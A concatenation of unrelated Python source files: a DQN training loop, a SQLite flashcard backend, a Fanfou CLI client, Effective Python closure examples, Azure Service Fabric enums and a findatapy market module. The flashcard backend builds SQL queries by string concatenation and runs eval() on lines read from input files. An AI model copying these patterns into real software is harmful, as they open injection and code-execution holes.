ctx=q_ctx) / float(255.0)
qval_npy = qnet.forward(is_train=False, data=state)[0].asnumpy()
action = numpy.argmax(qval_npy)
episode_q_value += qval_npy[0, action]
episode_action_step += 1
else:
action = npy_rng.randint(action_num)
# 2. Play the game for a single mega-step (Inside the game, the action may be repeated for several times)
game.play(action)
total_steps += 1
# 3. Update our Q network if we can start sampling from the replay memory
# Also, we update every `update_interval`
if total_steps % update_interval == 0 and game.replay_memory.sample_enabled:
# 3.1 Draw sample from the replay_memory
training_steps += 1
episode_update_step += 1
states, actions, rewards, next_states, terminate_flags \
= game.replay_memory.sample(batch_size=minibatch_size)
states = nd.array(states, ctx=q_ctx) / float(255.0)
next_states = nd.array(next_states, ctx=q_ctx) / float(255.0)
actions = nd.array(actions, ctx=q_ctx)
rewards = nd.array(rewards, ctx=q_ctx)
terminate_flags = nd.array(terminate_flags, ctx=q_ctx)
# 3.2 Use the target network to compute the scores and
# get the corresponding target rewards
if not args.double_q:
target_qval = target_qnet.forward(is_train=False, data=next_states)[0]
target_rewards = rewards + nd.choose_element_0index(target_qval,
nd.argmax_channel(target_qval))\
* (1.0 - terminate_flags) * discount
else:
target_qval = target_qnet.forward(is_train=False, data=next_states)[0]
qval = qnet.forward(is_train=False, data=next_states)[0]
target_rewards = rewards + nd.choose_element_0index(target_qval,
nd.argmax_channel(qval))\
* (1.0 - terminate_flags) * discount
outputs = qnet.forward(is_train=True,
data=states,
dqn_action=actions,
dqn_reward=target_rewards)
qnet.backward()
qnet.update(updater=updater)
# 3.3 Calculate Loss
diff = nd.abs(nd.choose_element_0index(outputs[0], actions) - target_rewards)
quadratic_part = nd.clip(diff, -1, 1)
loss = 0.5 * nd.sum(nd.square(quadratic_part)).asnumpy()[0] +\
nd.sum(diff - quadratic_part).asnumpy()[0]
episode_loss += loss
# 3.3 Update the target network every freeze_interval
if training_steps % freeze_interval == 0:
qnet.copy_params_to(target_qnet)
steps_left -= game.episode_step
time_episode_end = time.time()
# Update the statistics
epoch_reward += game.episode_reward
info_str = "Epoch:%d, Episode:%d, Steps Left:%d/%d, Reward:%f, fps:%f, Exploration:%f" \
% (epoch, episode, steps_left, steps_per_epoch, game.episode_reward,
game.episode_step / (time_episode_end - time_episode_start), eps_curr)
if episode_update_step > 0:
info_str += ", Avg Loss:%f/%d" % (episode_loss / episode_update_step,
episode_update_step)
if episode_action_step > 0:
info_str += ", Avg Q Value:%f/%d" % (episode_q_value / episode_action_step,
episode_action_step)
if episode % 100 == 0:
logging.info(info_str)
end = time.time()
fps = steps_per_epoch / (end - start)
qnet.save_params(dir_path=args.dir_path, epoch=epoch)
logging.info("Epoch:%d, FPS:%f, Avg Reward: %f/%d"
% (epoch, fps, epoch_reward / float(episode), episode))
if __name__ == '__main__':
main()
|
#!/usr/bin/python
'''
Morgan Phillips (c) 2013
This file is part of qaw.
qaw is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
qaw is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with qaw. If not, see <http://www.gnu.org/licenses/>.
'''
import sqlite3
import random
import re
import qaexceptions
class QABackend:
dbConn = sqlite3.connect('qaw.db')
def updateConfidenceLevel(self,tableName,questionID,newConfidence):
if(int(newConfidence) < 0):
newConfidence = 0
elif(int(newConfidence) > 100):
newConfidence = 100
dbCursor = self.dbConn.cursor()
updateConfidenceSQL = "UPDATE "+tableName+" SET confidence='"
updateConfidenceSQL += str(newConfidence)+"' WHERE "
updateConfidenceSQL += "id='"+str(questionID)+"'"
return dbCursor.execute(updateConfidenceSQL)
def loadCurrentTables(self):
dbCursor = self.dbConn.cursor()
loadTablesSQL = "SELECT name FROM sqlite_master WHERE type='table'"
returnList = list()
for tableName in dbCursor.execute(loadTablesSQL):
if tableName[0] != "sqlite_sequence":
returnList.append(tableName[0])
return returnList
def loadQuestionAnswer(self,tableNames = list()):
dbCursor = self.dbConn.cursor()
getQuestionAnswerSQL = "SELECT * FROM "
returnList = list()
tableName = random.choice(tableNames)
returnList.append(tableName)
getQuestionAnswerSQL += tableName
confidenceLevel = random.randint(0,100)
getQuestionAnswerSQL += " WHERE confidence < "+str(confidenceLevel)
getQuestionAnswerSQL += " ORDER BY RANDOM() LIMIT 1"
dbCursor.execute(getQuestionAnswerSQL)
returnList.append(dbCursor.fetchone())
return returnList
def loadTextFile(self,textFile,tableName=None):
try:
fileHandle = open(textFile,'r')
#A default tableName appears....
if tableName == None:
tableName = textFile.split('/')[-1].replace('.','')
dbCursor = self.dbConn.cursor()
createTableIfSQL = "CREATE TABLE IF NOT EXISTS "+tableName
createTableIfSQL += " (id INTEGER PRIMARY KEY AUTOINCREMENT,"
createTableIfSQL += "question TEXT UNIQUE,"
createTableIfSQL += "answer TEXT,confidence INTEGER DEFAULT 0)"
dbCursor.execute(createTableIfSQL)
lineCount = 0
for line in fileHandle:
lineCount += 1
match = re.search("[.*,.*].*",line)
if match != None:
try:
QA = eval(line)
insertSQL = "INSERT INTO "+tableName
insertSQL += " (question,answer) VALUES ('"+QA[0]+"','"+QA[1]+"')"
dbCursor.execute(insertSQL)
except:
print qaexceptions.ParsingError(lineCount)
self.dbConn.commit()
return "Finished"
except IOError, e:
return e
def dropTable(self,tableName):
try:
dbCursor = self.dbConn.cursor()
dropTableIfSQL = "DROP TABLE IF EXISTS "
dropTableIfSQL += tableName
dbCursor.execute(dropTableIfSQL)
return "Dropped: "+tableName
except:
return "Failed to drop: "+tableName
|
#!/usr/bin/env python3
# coding=utf-8
# Author: John Jiang
# Date : 2016/8/29
import argparse
import atexit
import logging
import os
import signal
import sys
from .util import clear_screen, open_in_browser
from .config import cfg
from .fan import Fan
def parse_args():
parser = argparse.ArgumentParser()
command_parser = parser.add_argument_group('命令')
command_parser.add_argument('-n', '--new', metavar='X', nargs='*', help='发布新的状态')
command_parser.add_argument('-i', '--image', help='添加图片')
command_parser.add_argument('-r', '--revert', action='store_true', help='撤回前一条消息')
command_parser.add_argument('-m', '--me', action='store_true', help='查看个人信息')
command_parser.add_argument('-u', '--user', metavar='ID', help='查看他人信息,参数为用户ID')
command_parser.add_argument('-v', '--view', action='store_true', help='浏览模式')
command_parser.add_argument('-d', '--random', action='store_true', help='随便看看')
command_parser.add_argument('--config', action='store_true', help='修改默认配置')
command_parser.add_argument('--login', action='store_true', help='登陆新的账号')
command_parser.add_argument('--switch', action='store_true', help='切换账号')
command_parser.add_argument('--dump', metavar='FILE', nargs='?', const='fanfou-archive.json',
help='备份所有状态,保存到 FILE 文件中(JSON格式)')
command_parser.add_argument('--lock', metavar='0/1', type=int, help='需要我批准才能查看我的消息(1表示上锁,0表示解锁)')
command_parser.add_argument('-V', '--version', action='store_true', help='显示版本号')
option_parser = parser.add_argument_group('选项')
option_parser.add_argument('--verbose', action='store_true', help='打印日志')
option_parser.add_argument('--show-id', dest='show_id', action='store_true', help='显示用户ID')
option_parser.add_argument('--show-time', dest='show_time_tag', action='store_true', help='显示时间标签')
option_parser.add_argument('--clear', dest='auto_clear', action='store_true', help='浏览完成后自动清屏')
option_parser.add_argument('--auto-auth', dest='auto_auth', action='store_true', help='自动验证')
option_parser.add_argument('--count', dest='timeline_count', type=int, help='时间线显示消息的数量')
option_parser.add_argument('--show-image', dest='show_image', action='store_true', help='显示图片')
option_parser.add_argument('--xauth', action='store_true', help='使用xauth验证方式')
return parser.parse_known_args()
def exit_handler(signal, frame):
print('\nBye!')
sys.exit(0)
def read_from_stdin():
try:
return sys.stdin.buffer.read().decode('utf8')
except UnicodeDecodeError:
logging.error('[x] 当前内容不是UTF-8编码,解码错误!')
sys.exit(1)
@atexit.register
def clear_screen_handler():
if cfg.auto_clear:
clear_screen()
def main():
signal.signal(signal.SIGINT, exit_handler)
args, unknown = parse_args()
level = logging.DEBUG if args.verbose else logging.INFO
logging.basicConfig(level=level,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
cfg.args = args
if args.version:
import fanfoucli
print(fanfoucli.__version__)
return
if len(sys.argv) == 1:
open_in_browser('http://fanfou.com')
return
fan = Fan(cfg)
if args.config:
cfg.configure()
elif args.dump:
fan.dump(args.dump)
elif args.login:
fan.login()
elif args.switch:
fan.switch_account()
elif args.revert:
fan.revert()
elif args.lock is not None:
fan.lock(bool(args.lock))
elif args.me:
fan.me()
elif args.user:
s, user = fan.api.users_show(id=args.user)
if s:
fan.display_user(user)
elif args.view:
fan.view()
elif args.random:
fan.random_view()
else:
status = ''
# fan -
# echo something | fan
if (len(sys.argv) == 2 and sys.argv[1] == '-') \
or (len(sys.argv) == 1 and hasattr(sys.stdin, 'fileno') and not os.isatty(sys.stdin.fileno())):
# sys.stdin.read默认使用sys.stdin.encoding解码,而sys.stdin.encoding是根据终端来设置,所以cat xx | fan会导致编码错误
# 这里改用从底层读取二进制流,然后手动按照utf8解析,如果文件不是utf8格式的话,仍然会出错
logging.debug('stdin encoding %s', sys.stdin.encoding)
status = read_from_stdin()
elif args.new: # fan -n something
status = ' '.join(args.new)
elif unknown: # fan anything
status = ' '.join(unknown)
# 发图片
if args.image:
fan.upload_photos(status, args.image)
else:
fan.update_status(status)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
'''Item 15 from Effective Python'''
# Example 1
''' A common way to do this is to pass a helper function as the key argument to
a list's sort method. The helper's return value will be used as the value for
sorting each item in the list '''
print('Example 1:\n==========')
def sort_priority(values, group):
def helper(x):
if x in group:
return (0, x)
return (1, x)
values.sort(key=helper)
# Example 2
''' That function works for simple inputs '''
print('\nExample 2:\n==========')
numbers = [8, 3, 1, 2, 5, 4, 7, 6]
group = {2, 3, 5, 7}
sort_priority(numbers, group)
print(numbers)
# Example 3
''' Why not also use the closure to flip a flag when high-priority items are
seen? Then the function can return the flag value after it's been modified by
the closure '''
print('\nExample 3:\n==========')
def sort_priority2(numbers, group):
found = False
def helper(x):
if x in group:
found = True # Seems simple
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
# Example 4
''' run the function on the same inputs as before '''
print('\nExample 4:\n==========')
found = sort_priority2(numbers, group)
print('Found:', found)
print(numbers)
# Example 5
''' The nonlocal statement is used to indicate that scope traversal should
happen upon assignment for a specific variable name '''
print('\nExample 5:\n==========')
def sort_priority3(numbers, group):
found = False
def helper(x):
nonlocal found
if x in group:
found = True
return (0, x)
return (1, x)
numbers.sort(key=helper)
return found
# Example 6
''' When your usage of nonlocal starts getting complicated, it's better to wrap
your state in a helper class. Here, I define a class that achieves the same
result as the nonlocal approach '''
print('\nExample 6:\n==========')
class Sorter(object):
def __init__(self, group):
self.group = group
self.found = False
def __call__(self, x):
if x in self.group:
self.found = True
return (0, x)
return (1, x)
sorter = Sorter(group)
numbers.sort(key=sorter)
assert sorter.found is True
print('Found:', found)
print(numbers)
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class Access(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The network traffic is allowed or denied.
"""
ALLOW = "allow"
DENY = "deny"
class ClusterState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current state of the cluster.
"""
#: Indicates that the cluster resource is created and the resource provider is waiting for Service
#: Fabric VM extension to boot up and report to it.
WAITING_FOR_NODES = "WaitingForNodes"
#: Indicates that the Service Fabric runtime is being installed on the VMs. Cluster resource will
#: be in this state until the cluster boots up and system services are up.
DEPLOYING = "Deploying"
#: Indicates that the cluster is upgrading to establishes the cluster version. This upgrade is
#: automatically initiated when the cluster boots up for the first time.
BASELINE_UPGRADE = "BaselineUpgrade"
#: Indicates that the cluster is being upgraded with the user provided configuration.
UPGRADING = "Upgrading"
#: Indicates that the last upgrade for the cluster has failed.
UPGRADE_FAILED = "UpgradeFailed"
#: Indicates that the cluster is in a stable state.
READY = "Ready"
class ClusterUpgradeCadence(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates when new cluster runtime version upgrades will be applied after they are released. By
default is Wave0.
"""
#: Cluster upgrade starts immediately after a new version is rolled out. Recommended for Test/Dev
#: clusters.
WAVE0 = "Wave0"
#: Cluster upgrade starts 7 days after a new version is rolled out. Recommended for Pre-prod
#: clusters.
WAVE1 = "Wave1"
#: Cluster upgrade starts 14 days after a new version is rolled out. Recommended for Production
#: clusters.
WAVE2 = "Wave2"
class ClusterUpgradeMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The upgrade mode of the cluster when new Service Fabric runtime version is available.
"""
#: The cluster will be automatically upgraded to the latest Service Fabric runtime version,
#: **clusterUpgradeCadence** will determine when the upgrade starts after the new version becomes
#: available.
AUTOMATIC = "Automatic"
#: The cluster will not be automatically upgraded to the latest Service Fabric runtime version.
#: The cluster is upgraded by setting the **clusterCodeVersion** property in the cluster resource.
MANUAL = "Manual"
class Direction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network security rule direction.
"""
INBOUND = "inbound"
OUTBOUND = "outbound"
class DiskType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Managed data disk type. IOPS and throughput are given by the disk size, to see more information
go to https://docs.microsoft.com/en-us/azure/virtual-machines/disks-types.
"""
#: Standard HDD locally redundant storage. Best for backup, non-critical, and infrequent access.
STANDARD_LRS = "Standard_LRS"
#: Standard SSD locally redundant storage. Best for web servers, lightly used enterprise
#: applications and dev/test.
STANDARD_SSD_LRS = "StandardSSD_LRS"
#: Premium SSD locally redundant storage. Best for production and performance sensitive workloads.
PREMIUM_LRS = "Premium_LRS"
class FailureAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The compensating action to perform when a Monitored upgrade encounters monitoring policy or
health policy violations. Invalid indicates the failure action is invalid. Rollback specifies
that the upgrade will start rolling back automatically. Manual indicates that the upgrade will
switch to UnmonitoredManual upgrade mode.
"""
#: Indicates that a rollback of the upgrade will be performed by Service Fabric if the upgrade
#: fails.
ROLLBACK = "Rollback"
#: Indicates that a manual repair will need to be performed by the administrator if the upgrade
#: fails. Service Fabric will not proceed to the next upgrade domain automatically.
MANUAL = "Manual"
class ManagedClusterAddOnFeature(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Available cluster add-on features
"""
DNS_SERVICE = "DnsService"
BACKUP_RESTORE_SERVICE = "BackupRestoreService"
RESOURCE_MONITOR_SERVICE = "ResourceMonitorService"
class ManagedIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of managed identity for the resource.
"""
#: Indicates that no identity is associated with the resource.
NONE = "None"
#: Indicates that system assigned identity is associated with the resource.
SYSTEM_ASSIGNED = "SystemAssigned"
#: Indicates that user assigned identity is associated with the resource.
USER_ASSIGNED = "UserAssigned"
#: Indicates that both system assigned and user assigned identity are associated with the
#: resource.
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
class ManagedResourceProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The provisioning state of the managed resource.
"""
NONE = "None"
CREATING = "Creating"
CREATED = "Created"
UPDATING = "Updating"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
DELETING = "Deleting"
DELETED = "Deleted"
OTHER = "Other"
class MoveCost(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Specifies the move cost for the service.
"""
#: Zero move cost. This value is zero.
ZERO = "Zero"
#: Specifies the move cost of the service as Low. The value is 1.
LOW = "Low"
#: Specifies the move cost of the service as Medium. The value is 2.
MEDIUM = "Medium"
#: Specifies the move cost of the service as High. The value is 3.
HIGH = "High"
class NsgProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Network protocol this rule applies to.
"""
HTTP = "http"
HTTPS = "https"
TCP = "tcp"
UDP = "udp"
ICMP = "icmp"
AH = "ah"
ESP = "esp"
class PartitionScheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Indicates that the partition is based on string names, and is a SingletonPartitionScheme
#: object, The value is 0.
SINGLETON = "Singleton"
#: Indicates that the partition is based on Int64 key ranges, and is a
#: UniformInt64RangePartitionScheme object. The value is 1.
UNIFORM_INT64_RANGE = "UniformInt64Range"
#: Indicates that the partition is based on string names, and is a NamedPartitionScheme object.
#: The value is 2.
NAMED = "Named"
class ProbeProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""the reference to the load balancer probe used by the load balancing rule.
"""
TCP = "tcp"
HTTP = "http"
HTTPS = "https"
class Protocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The reference to the transport protocol used by the load balancing rule.
"""
TCP = "tcp"
UDP = "udp"
class RollingUpgradeMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The mode used to monitor health during a rolling upgrade. The values are Monitored, and
UnmonitoredAuto.
"""
#: The upgrade will stop after completing each upgrade domain and automatically monitor health
#: before proceeding. The value is 0.
MONITORED = "Monitored"
#: The upgrade will proceed automatically without performing any health monitoring. The value is
#: 1.
UNMONITORED_AUTO = "UnmonitoredAuto"
class ServiceCorrelationScheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The service correlation scheme.
"""
#: Aligned affinity ensures that the primaries of the partitions of the affinitized services are
#: collocated on the same nodes. This is the default and is the same as selecting the Affinity
#: scheme. The value is 0.
ALIGNED_AFFINITY = "AlignedAffinity"
#: Non-Aligned affinity guarantees that all replicas of each service will be placed on the same
#: nodes. Unlike Aligned Affinity, this does not guarantee that replicas of particular role will
#: be collocated. The value is 1.
NON_ALIGNED_AFFINITY = "NonAlignedAffinity"
class ServiceKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The kind of service (Stateless or Stateful).
"""
#: Does not use Service Fabric to make its state highly available or reliable. The value is 0.
STATELESS = "Stateless"
#: Uses Service Fabric to make its state or part of its state highly available and reliable. The
#: value is 1.
STATEFUL = "Stateful"
class ServiceLoadMetricWeight(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Determines the metric weight relative to the other metrics that are configured for this
service. During runtime, if two metrics end up in conflict, the Cluster Resource Manager
prefers the metric with the higher weight.
"""
#: Disables resource balancing for this metric. This value is zero.
ZERO = "Zero"
#: Specifies the metric weight of the service load as Low. The value is 1.
LOW = "Low"
#: Specifies the metric weight of the service load as Medium. The value is 2.
MEDIUM = "Medium"
#: Specifies the metric weight of the service load as High. The value is 3.
HIGH = "High"
class ServicePackageActivationMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The activation Mode of the service package
"""
#: Indicates the application package activation mode will use shared process.
SHARED_PROCESS = "SharedProcess"
#: Indicates the application package activation mode will use exclusive process.
EXCLUSIVE_PROCESS = "ExclusiveProcess"
class ServicePlacementPolicyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of placement policy for a service fabric service. Following are the possible values.
"""
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementInvalidDomainPolicyDescription, which indicates that a particular fault or
#: upgrade domain cannot be used for placement of this service. The value is 0.
INVALID_DOMAIN = "InvalidDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementRequireDomainDistributionPolicyDescription indicating that the replicas of the
#: service must be placed in a specific domain. The value is 1.
REQUIRED_DOMAIN = "RequiredDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementPreferPrimaryDomainPolicyDescription, which indicates that if possible the
#: Primary replica for the partitions of the service should be located in a particular domain as
#: an optimization. The value is 2.
PREFERRED_PRIMARY_DOMAIN = "PreferredPrimaryDomain"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementRequireDomainDistributionPolicyDescription, indicating that the system will
#: disallow placement of any two replicas from the same partition in the same domain at any time.
#: The value is 3.
REQUIRED_DOMAIN_DISTRIBUTION = "RequiredDomainDistribution"
#: Indicates that the ServicePlacementPolicyDescription is of type
#: ServicePlacementNonPartiallyPlaceServicePolicyDescription, which indicates that if possible all
#: replicas of a particular partition of the service should be placed atomically. The value is 4.
NON_PARTIALLY_PLACE_SERVICE = "NonPartiallyPlaceService"
class ServiceScalingMechanismKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Represents a scaling mechanism for adding or removing instances of stateless service partition.
#: The value is 0.
SCALE_PARTITION_INSTANCE_COUNT = "ScalePartitionInstanceCount"
#: Represents a scaling mechanism for adding or removing named partitions of a stateless service.
#: The value is 1.
ADD_REMOVE_INCREMENTAL_NAMED_PARTITION = "AddRemoveIncrementalNamedPartition"
class ServiceScalingTriggerKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enumerates the ways that a service can be partitioned.
"""
#: Represents a scaling trigger related to an average load of a metric/resource of a partition.
#: The value is 0.
AVERAGE_PARTITION_LOAD = "AveragePartitionLoad"
#: Represents a scaling policy related to an average load of a metric/resource of a service. The
#: value is 1.
AVERAGE_SERVICE_LOAD = "AverageServiceLoad"
class SkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Sku Name.
"""
#: Basic requires a minimum of 3 nodes and allows only 1 node type.
BASIC = "Basic"
#: Requires a minimum of 5 nodes and allows 1 or more node type.
STANDARD = "Standard"
|
__author__ = 'saeedamen' # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and limitations under the License.
#
"""
Market
Market object is higher level object which fetches market data using underlying classes such as MarketDataGenerator. Also
contains several other classes, which are for asset specific instances.
"""
from findatapy.util import DataConstants
# from deco import *
class Market(object):
def __init__(self, market_data_generator = None, md_request = None):
if market_data_generator is None:
if DataConstants().default_market_data_generator == "marketdatagenerator":
from findatapy.market import MarketDataGenerator
market_data_generator = MarketDataGenerator()
elif DataConstants().default_market_data_generator == 'cachedmarketdatagenerator':
# NOT CURRENTLY IMPLEMENTED FOR FUTURE USE
from finexpy.market import CachedMarketDataGenerator
market_data_generator = CachedMarketDataGenerator()
self.market_data_generator = market_data_generator
self.md_request = md_request
def fetch_market(self, md_request = None):
if self.md_request is not None:
md_request = self.md_request
# special cases when a predefined category has been asked
if md_request.category is not None:
if (md_request.category == 'fx-spot-volume' and md_request.data_source == 'quandl'):
# NOT CURRENTLY IMPLEMENTED FOR FUTURE USE
from findatapy.market.fxclsvolume import FXCLSVolume
fxcls = FXCLSVolume(market_data_generator=self.market_data_generator)
return fxcls.get_fx_volume(md_request.start_date, md_request.finish_date, md_request.tickers, cut="LOC", source="quandl",
cache_algo=md_request.cache_algo)
if (md_request.category == 'fx' or md_request.category == 'fx-tot') and md_request.tickers is not None:
fxcf = FXCrossFactory(market_data_generator=self.market_data_generator)
if md_request.category == 'fx':
type = 'spot'
elif md_request.category == 'fx-tot':
type = 'tot'
if (md_request.freq != 'tick' and md_request.fields == ['close']) or (md_request.freq == 'tick' and md_request.data_source == 'dukascopy'):
return fxcf.get_fx_cross(md_request.start_date, md_request.finish_date,
md_request.tickers,
cut = md_request.cut, source = md_request.data_source, freq = md_request.freq, cache_algo=md_request.cache_algo, type = type,
environment = md_request.environment)
if (md_request.category == 'fx-implied-vol'):
if md_request.tickers is not None and md_request.freq == 'daily':
df = []
fxvf = FXVolFactory(market_data_generator=self.market_data_generator)
for t in md_request.tickers:
if len(t) == 6:
df.append(fxvf.get_fx_implied_vol(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source, part=fxvf.part,
cache_algo_return=md_request.cache_algo))
if df != []:
return Calculations().pandas_outer_join(df)
if(md_request.category == 'fx-vol-market'):
if md_request.tickers is not None:
df = []
fxcf = FXCrossFactory(market_data_generator=self.market_data_generator)
fxvf = FXVolFactory(market_data_generator=self.market_data_generator)
rates = RatesFactory(market_data_generator=self.market_data_generator)
for t in md_request.tickers:
if len(t) == 6:
df.append(fxcf.get_fx_cross(start=md_request.start_date, end=md_request.finish_date, cross=t,
cut=md_request.cut, source=md_request.data_source, freq=md_request.freq,
cache_algo=md_request.cache_algo, type='spot', environment=md_request.environment,
fields=['close']))
df.append(fxvf.get_fx_implied_vol(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
part=fxvf.part,
cache_algo=md_request.cache_algo))
df.append(rates.get_fx_forward_points(md_request.start_date, md_request.finish_date, t, fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
cache_algo=md_request.cache_algo))
df.append(rates.get_base_depos(md_request.start_date, md_request.finish_date, ["USD", "EUR", "CHF", "GBP"], fxvf.tenor,
cut=md_request.cut, source=md_request.data_source,
cache_algo=md_request.cache_algo
))
if df != []:
return Calculations().pandas_outer_join(df)
# TODO add more special examples here for different asset classes
# the idea is that we do all the market data downloading here, rather than elsewhere
# by default: pass the market data request to MarketDataGenerator
return self.market_data_generator.fetch_market_data(md_request)
########################################################################################################################
"""
FXCrossFactory
Class generates FX spot time series and FX total return time series (assuming we already have
total return indices available from xxxUSD form) from underlying series.
"""
from findatapy.market.marketdatarequest import MarketDataRequest
from findatapy.timeseries import Calculations
from findatapy.util.fxconv import FXConv
from findatapy.util.loggermanager import LoggerManager
class FXCrossFactory(object):
def __init__(self, market_data_generator = None):
self.logger = LoggerManager().getLogger(__name__)
self.fxconv = FXConv()
self.cache = {}
self.calculations = Calculations()
self.market_data_generator = market_data_generator
return
def flush_cache(self):
self.cache = {}
def get_fx_cross_tick(self, start, end, cross,
cut = "NYC", source = "dukascopy", cache_algo = 'internet_load_return', type = 'spot',
environment = 'backtest', fields = ['bid', 'ask']):
if isinstance(cross, str):
cross = [cross]
market_data_request = MarketDataRequest(
gran_freq="tick",
freq_mult = 1,
freq = 'tick',
cut = cut,
fields = ['bid', 'ask', 'bidv', 'askv'],
cache_algo=cache_algo,
environment = environment,
start_date = start,
finish_date = end,
data_source = source,
category = 'fx'
)
market_data_generator = self.market_data_generator
data_frame_agg = None
for cr in cross:
if (type == 'spot'):
market_data_request.tickers = cr
cross_vals = market_data_generator.fetch_market_data(market_data_request)
# if user only wants 'close' calculate that from the bid/ask fields
if fields == ['close']:
cross_vals = cross_vals[[cr + '.bid', cr + '.ask']].mean(axis=1)
cross_vals.columns = [cr + '.close']
else:
filter = Filter()
filter_columns = [cr + '.' + f for f in fields]
cross_vals = filter.filter_time_series_by_columns(cross_vals, filter_columns)
if data_frame_agg is None:
data_frame_agg = cross_vals
else:
data_frame_agg = data_frame_agg.join(cross_vals, how='outer')
# strip the nan elements
data_frame_agg = data_frame_agg.dropna()
return data_frame_agg
def get_fx_cross(self, start, end, cross,
cut = "NYC", source = "bloomberg", freq = "intraday", cache_algo='internet_load_return', type = 'spot',
environment = 'backtest', fields = ['close']):
if source == "gain" or source == 'dukascopy' or freq == 'tick':
return self.get_fx_cross_tick(start, end, cross,
cut = cut, source = source, cache_algo = cache_algo, type = 'spot', fields = fields)
if isinstance(cross, str):
cross = [cross]
market_data_request_list = []
freq_list = []
type_list = []
for cr in cross:
market_data_request = MarketDataRequest(freq_mult=1,
cut=cut,
fields=['close'],
freq=freq,
cache_algo=cache_algo,
start_date=start,
finish_date=end,
data_source=source,
environment=environment)
market_data_request.type = type
market_data_request.cross = cr
if freq == 'intraday':
market_data_request.gran_freq = "minute" # intraday
elif freq == 'daily':
market_data_request.gran_freq = "daily" # daily
market_data_request_list.append(market_data_request)
data_frame_agg = []
# depends on the nature of operation as to whether we should use threading or multiprocessing library
if DataConstants().market_thread_technique is "thread":
from multiprocessing.dummy import Pool
else:
# most of the time is spend waiting for Bloomberg to return, so can use threads rather than multiprocessing
# must use the multiprocessing_on_dill library otherwise can't pickle objects correctly
# note: currently not very stable
from multiprocessing_on_dill import Pool
thread_no = DataConstants().market_thread_no['other']
if market_data_request_list[0].data_source in DataConstants().market_thread_no:
thread_no = DataConstants().market_thread_no[market_data_request_list[0].data_source]
# fudge, issue with multithreading and accessing HDF5 files
# if self.market_data_generator.__class__.__name__ == 'CachedMarketDataGenerator':
# thread_no = 0
if (thread_no > 0):
pool = Pool(thread_no)
# open the market data downloads in their own threads and return the results
result = pool.map_async(self._get_individual_fx_cross, market_data_request_list)
data_frame_agg = self.calculations.iterative_outer_join(result.get())
# data_frame_agg = self.calculations.pandas_outer_join(result.get())
# pool would have already been closed earlier
# try:
# pool.close()
# pool.join()
# except: pass
else:
for md_request in market_data_request_list:
data_frame_agg.append(self._get_individual_fx_cross(md_request))
data_frame_agg = self.calculations.pandas_outer_join(data_frame_agg)
# strip the nan elements
data_frame_agg = data_frame_agg.dropna()
return data_frame_agg
